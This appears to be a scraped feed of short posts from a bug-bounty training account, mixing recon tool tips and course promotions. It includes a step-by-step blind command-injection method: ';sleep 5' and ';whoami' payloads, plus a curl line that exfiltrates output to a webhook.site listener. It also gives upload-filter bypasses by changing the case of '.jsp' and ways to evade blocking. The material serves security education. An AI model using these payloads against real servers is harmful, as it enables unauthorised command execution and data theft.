Getting blocked by servers while using cURL?. Most sites don’t like requests from cURL and will often block it because it's a red flag for bots or scraping tools. Try changing your User-Agent header, like this:. curl " https://hackinghub[.]io" -A "<NEW-USER-AGENT>"

Install ASNMap here 👇.

Mapping an organization’s Autonomous System Number (ASN) is a great way to uncover IP ranges tied to your target!. Use asnmap like this:.asnmap -org <TARGET> -json | jq -r .as_number | sort -u. Combine this with tools like nmap, amass, or masscan.

Happy July 4th from all of us at HackingHub!. For this week only you can get $30 for 30 days OR $100 for lifetime access to:.💥 Hands-On Web Exploitation by NahamSec.💥 Linux for Hackers Fundamentals by John Hammond. Get Offer:

Summary:. 💥 Use ;sleep 5 to confirm blind RCE.💥 Use curl with Webhook[.]site to exfiltrate output.💥 Webhook[.]site acts as a temporary listener.💥 Great for demos, PoCs, and beginner-friendly workflows.

Step 4: Verify the Output at Webhook[.]site. Visit your unique Webhook[.]site URL and you’ll see a new request with the POST body: user=www-data. That confirms command output was exfiltrated successfully.

Step 3: Exfiltrate Output Using Webhook[.]site using a payload like this:. curl -X POST -d "user=$(whoami)" https://webhook[.]site/YOUR-ID. This will send the output of whoami to your webhook URL as an HTTP POST request.

Step 2: Use a Time-Based Payload like ;sleep 5. If the server delays its response by ~5 seconds, it confirms your command executed. This proves RCE is real, even if output is hidden.

How to Test and Confirm RCE, Then Exfiltrate Data (no firewall):. Step 1: Test if RCE is possible with something like ;whoami. Since the app doesn’t return output (blind RCE), you need a side-channel to confirm it. Continued in thread 👇

If a server blocks file uploads based on extension, try changing the casing of the file extension. Many insecure filters don’t normalize case properly. Try this:.❌ .jsp → ✅ .JsP.❌ .jsp → ✅ .JSP.❌ .jsp → ✅ .jSp. This can help you sneak past naive validations.

@TomNomNom Install gron 👇.

jq syntax tends to be complex. Hats off to anyone that knows it by heart. For those of you that would prefer something more simple, try @tomnomnom's gron. It makes JSON greppable and easy to filter. Check this out 👇

Want to know which services a domain relies on?. Dumping TXT records with zdns is great for spotting:.💥 Third-party services like Webflow, Google, SendGrid.💥 Misconfigured SPF/DKIM.💥 Shadow services

Sometimes direct IP access gets blocked but hostnames that resolve to the same IP can slip through. That’s where wildcard DNS services like come in handy. Check this out. All of these resolve to 8.8.8.8 👇

Celebrate the wins (even if they're dupes) 🎉

jq is such a useful tool if you're dealing with JSON data. Here's an amazing cheatsheet that you need to bookmark if you're working with JSON data and want to make the most out of jq. 🔖 Bookmark now:

RT @RedTeamVillage_: Shoutout to @hackinghub_io for sponsoring Red Team Village at #DC33 as a Silver Sponsor! 🥈💻.Thanks for supporting the….

So you've confirmed RCE with a ;sleep 5 payload but can't see any output?. Try using to retrieve the output indirectly. Try this payload:.curl -X POST -d "user=$(whoami)" https://webhook[.]site/YOUR-ID. The result of whoami is sent to your webhook URL!

This is the quickest way to install and manage all of the amazing @pdiscoveryio tools:. ✅ Install all: pdtm -ia.🔁 Update all: pdtm -ua.❌ Remove all: pdtm -ra (not sure why you'd need this one tbh) . Useful when setting up a new VPS! . Install pdtm 👇.

Want to test this out? Try this lab: